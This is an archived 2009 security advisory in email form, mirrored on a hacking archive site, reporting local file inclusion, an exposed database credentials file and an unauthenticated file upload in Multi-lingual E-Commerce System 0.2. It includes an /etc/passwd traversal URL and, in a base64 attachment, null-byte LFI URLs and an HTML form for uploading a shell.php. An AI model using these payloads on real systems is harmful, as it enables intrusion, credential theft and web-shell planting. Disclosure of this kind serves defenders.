AOH :: HP Unsorted M :: VA3228.HTM

Multi-lingual E-Commerce System 0.2 Multiple Remote Vulnerabilities



Multi-lingual E-Commerce System 0.2 Multiple Remote Vulnerabilities
Multi-lingual E-Commerce System 0.2 Multiple Remote Vulnerabilities



--001636c5a7364015950467ea1c3f
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

*******   Salvatore "drosophila" Fresta   *******

[+] Application: Multi-lingual E-Commerce System
[+] Version: 0.2
[+] Website: http://sourceforge.net/projects/mlecsphp/ 

[+] Bugs: [A] Local File Inclusion
          [B] Information Disclosure
          [C] Arbitrary File Upload

[+] Exploitation: Remote
[+] Date: 19 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com 


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Local File Inclusion

[-] Risk: hight
[-] File affected: index.php

This bug allows a guest to include local files.
The following is the vulnerable code:

...

if (isset($_GET['lang'])) { $_SESSION['lang'] = $_GET['lang'];}

...



...


- [B] Information Disclosure

[-] Risk: medium
[-] File affected: database.inc

This file contains reserved informations such as
the username and the password for connecting to
the database. Using .inc extension only, the
content is visible.

- [C] Arbitrary File Upload

[-] Risk: medium
[-] File affected: product_image.php

In the admin directory there are no files that
check if the user has admin privileges. For this
reason a guest can execute the files contained in
this directory. product_image.php contains a form
that allows to upload files on the system but
does not contain functions that check the files
extensions, however a user can upload arbitrary
files.


*************************************************

[+] Code


- [A] Local File Inclusion

http://www.site.com/path/index.php?page=../../../../../etc/passwd 

--001636c5a7364015950467ea1c3f
Content-Type: text/plain; charset=windows-1257; 
	name="Multi-lingual E-Commerce System 0.2 Multiple Remote Vulnerabilities-19042009.txt"
Content-Disposition: attachment; 
	filename="Multi-lingual E-Commerce System 0.2 Multiple Remote Vulnerabilities-19042009.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_ftpwbbac0

KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw
cGxpY2F0aW9uOiBNdWx0aS1saW5ndWFsIEUtQ29tbWVyY2UgU3lzdGVtClsrXSBWZXJzaW9uOiAw
LjIKWytdIFdlYnNpdGU6IGh0dHA6Ly9zb3VyY2Vmb3JnZS5uZXQvcHJvamVjdHMvbWxlY3NwaHAv
CgpbK10gQnVnczogW0FdIExvY2FsIEZpbGUgSW5jbHVzaW9uCiAgICAgICAgICBbQl0gSW5mb3Jt
YXRpb24gRGlzY2xvc3VyZQogICAgICAgICAgW0NdIEFyYml0cmFyeSBGaWxlIFVwbG9hZAoKWytd
IEV4cGxvaXRhdGlvbjogUmVtb3RlClsrXSBEYXRlOiAxOSBBcHIgMjAwOQoKWytdIERpc2NvdmVy
ZWQgYnk6IFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhClsrXSBBdXRob3I6IFNhbHZhdG9y
ZSAiZHJvc29waGlsYSIgRnJlc3RhClsrXSBDb250YWN0OiBlLW1haWw6IGRyb3NvcGhpbGF4eHhA
Z21haWwuY29tCgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKgoKWytdIE1lbnUKCjEpIEJ1Z3MKMikgQ29kZQozKSBGaXgKCgoqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgpbK10gQnVncwoKCi0gW0FdIExvY2Fs
IEZpbGUgSW5jbHVzaW9uCgpbLV0gUmlzazogaGlnaHQKWy1dIEZpbGUgYWZmZWN0ZWQ6IGluZGV4
LnBocAoKVGhpcyBidWcgYWxsb3dzIGEgZ3Vlc3QgdG8gaW5jbHVkZSBsb2NhbCBmaWxlcy4KVGhl
IGZvbGxvd2luZyBpcyB0aGUgdnVsbmVyYWJsZSBjb2RlOgoKLi4uCgppZiAoaXNzZXQoJF9HRVRb
J2xhbmcnXSkpIHsgJF9TRVNTSU9OWydsYW5nJ10gPSAkX0dFVFsnbGFuZyddO30KCi4uLgoKPD8K
aW5jbHVkZSgkaW5jbHVkZV9wYXRoLicvaW5jLycuJF9HRVRbJ3BhZ2UnXS4nLScuJF9TRVNTSU9O
WydsYW5nJ10uJy5waHAnKTsKPz4KCi4uLgoKCi0gW0JdIEluZm9ybWF0aW9uIERpc2Nsb3N1cmUK
ClstXSBSaXNrOiBtZWRpdW0KWy1dIEZpbGUgYWZmZWN0ZWQ6IGRhdGFiYXNlLmluYwoKVGhpcyBm
aWxlIGNvbnRhaW5zIHJlc2VydmVkIGluZm9ybWF0aW9ucyBzdWNoIGFzCnRoZSB1c2VybmFtZSBh
bmQgdGhlIHBhc3N3b3JkIGZvciBjb25uZWN0aW5nIHRvCnRoZSBkYXRhYmFzZS4gVXNpbmcgLmlu
YyBleHRlbnNpb24gb25seSwgdGhlIApjb250ZW50IGlzIHZpc2libGUuCgotIFtDXSBBcmJpdHJh
cnkgRmlsZSBVcGxvYWQKClstXSBSaXNrOiBtZWRpdW0KWy1dIEZpbGUgYWZmZWN0ZWQ6IHByb2R1
Y3RfaW1hZ2UucGhwCgpJbiB0aGUgYWRtaW4gZGlyZWN0b3J5IHRoZXJlIGFyZSBubyBmaWxlcyB0
aGF0CmNoZWNrIGlmIHRoZSB1c2VyIGhhcyBhZG1pbiBwcml2aWxlZ2VzLiBGb3IgdGhpcwpyZWFz
b24gYSBndWVzdCBjYW4gZXhlY3V0ZSB0aGUgZmlsZXMgY29udGFpbmVkIGluCnRoaXMgZGlyZWN0
b3J5LiBwcm9kdWN0X2ltYWdlLnBocCBjb250YWlucyBhIGZvcm0KdGhhdCBhbGxvd3MgdG8gdXBs
b2FkIGZpbGVzIG9uIHRoZSBzeXN0ZW0gYnV0IApkb2VzIG5vdCBjb250YWluIGZ1bmN0aW9ucyB0
aGF0IGNoZWNrIHRoZSBmaWxlcyAKZXh0ZW5zaW9ucywgaG93ZXZlciBhIHVzZXIgY2FuIHVwbG9h
ZCBhcmJpdHJhcnkgCmZpbGVzLgoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioKClsrXSBDb2RlCgoKLSBbQV0gTG9jYWwgRmlsZSBJbmNsdXNpb24KCmh0
dHA6Ly93d3cuc2l0ZS5jb20vcGF0aC9pbmRleC5waHA/cGFnZT0uLi8uLi8uLi8uLi8uLi9ldGMv
cGFzc3dkACUwMAoKaHR0cDovL3d3dy5zaXRlLmNvbS9wYXRoL2luZGV4LnBocD9sYW5nPS8uLi8u
Li8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkACUwMAoKCi0gW0JdIEluZm9ybWF0aW9uIERpc2Nsb3N1
cmUKCmh0dHA6Ly93d3cuc2l0ZS5jb20vcGF0aC9hZG1pbi9pbmMvZGF0YWJhc2UuaW5jCgoKLSBb
Q10gQXJiaXRyYXJ5IEZpbGUgVXBsb2FkCgo8aHRtbD4KICA8aGVhZD4KICAgIDx0aXRsZT5NdWx0
aS1saW5ndWFsIEUtQ29tbWVyY2UgU3lzdGVtIDAuMiBBcmJpdHJhcnkgRmlsZSBVcGxvYWQgRXhw
bG9pdDwvdGl0bGU+CiAgPC9oZWFkPgogIDxib2R5PgogICAgPGZvcm0gZW5jdHlwZT0ibXVsdGlw
YXJ0L2Zvcm0tZGF0YSIgYWN0aW9uPSJodHRwOi8vc2l0ZS9wYXRoL2FkbWluL3Byb2R1Y3RfaW1h
Z2UucGhwIiBtZXRob2Q9IlBPU1QiPgoJIDxsYWJlbCBmb3I9InByb2R1Y3QiPlZhbGlkIHByb2R1
Y3QgSUQ6PC9sYWJlbD48YnI+CgkgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InByb2R1Y3QiIHZh
bHVlPSIxIj48YnI+CgkgPGxhYmVsIGZvcj0iZmlsZV9uYW1lIj5FdmlsIGZpbGUgbmFtZTo8L2xh
YmVsPjxicj4KCSA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iZmlsZV9uYW1lIiB2YWx1ZT0iL3No
ZWxsLnBocCI+PGJyPgoJIDxsYWJlbCBmb3I9InVzZXJmaWxlIj5GaWxlOjwvbGFiZWw+CgkgPGlu
cHV0IG5hbWU9InVzZXJmaWxlIiB0eXBlPSJmaWxlIj4KCSA8aW5wdXQgdHlwZT0iaGlkZGVuIiBu
YW1lPSJmaWxlX3BhdGgiPjxicj48YnI+CgkgPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlVw
bG9hZCI+CiAgIDwvZm9ybT4KICA8L2JvZHk+CjwvaHRtbD4KCgoqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgpbK10gRml4CgpObyBmaXguCgoKKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKg=--001636c5a7364015950467ea1c3f--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.